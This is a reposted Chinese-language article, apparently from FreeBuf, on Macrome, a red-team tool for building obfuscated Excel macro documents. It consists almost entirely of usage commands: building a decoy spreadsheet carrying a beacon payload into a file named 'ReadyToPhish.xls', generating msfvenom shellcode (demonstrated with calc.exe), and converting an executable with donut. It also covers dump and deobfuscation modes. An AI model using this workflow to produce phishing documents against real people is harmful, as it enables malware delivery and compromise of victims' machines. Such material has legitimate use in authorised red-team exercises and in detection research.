Macrome:一款针对红队人员的Excel宏文档处理工具
来源:admin
发布时间:2022-08-22 17:31:52
点击数:
推荐关注
关于Macrome
工具安装/构建
git clone https://github.com/michaelweber/Macrome.git
dotnet run -- build --decoy-document Docs\decoy_document.xls --payload Docs\popcalc.bin
dotnet build cd bin/Debug/netcoreapp2.0 dotnet Macrome.dll deobfuscate --path obfuscated_document.xls
工具使用
构建模式
Macrome build --decoy-document decoy_document.xls --payload beacon.bin --payload64-bit beacon64.bin --payload-method Base64 --method ArgumentSubroutines --password VelvetSweatshop --preamble preamble.txt --output-file-name ReadyToPhish.xls
msfvenom -a x86 -b '\x00' --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f raw EXITFUNC=thread > popcalc.bin
msfvenom -a x64 -b '\x00' --platform windows -p windows/x64/exec cmd=calc.exe -e x64/xor -f raw EXITFUNC=thread > popcalc64.bin
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload popcalc.bin --payload64-bit popcalc64.bin
donut.exe -a 3 -b 1 -z 1 executableToEmbed.exe
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload macro-example.txt --payload-type Macro
导出模式
dotnet Macrome.dll dump --path docToDump.xls
反混淆模式
dotnet Macrome.dll deobfuscate --path path/to/obfuscated_file.xls
参考资料
本文转自FreeBuf.COM,原作者Alpha_h4ck, 转载请注明来自FreeBuf.COM(侵删)